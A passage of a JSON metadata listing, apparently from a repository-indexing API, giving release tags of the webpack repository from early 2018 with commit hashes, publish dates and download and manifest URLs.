/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webp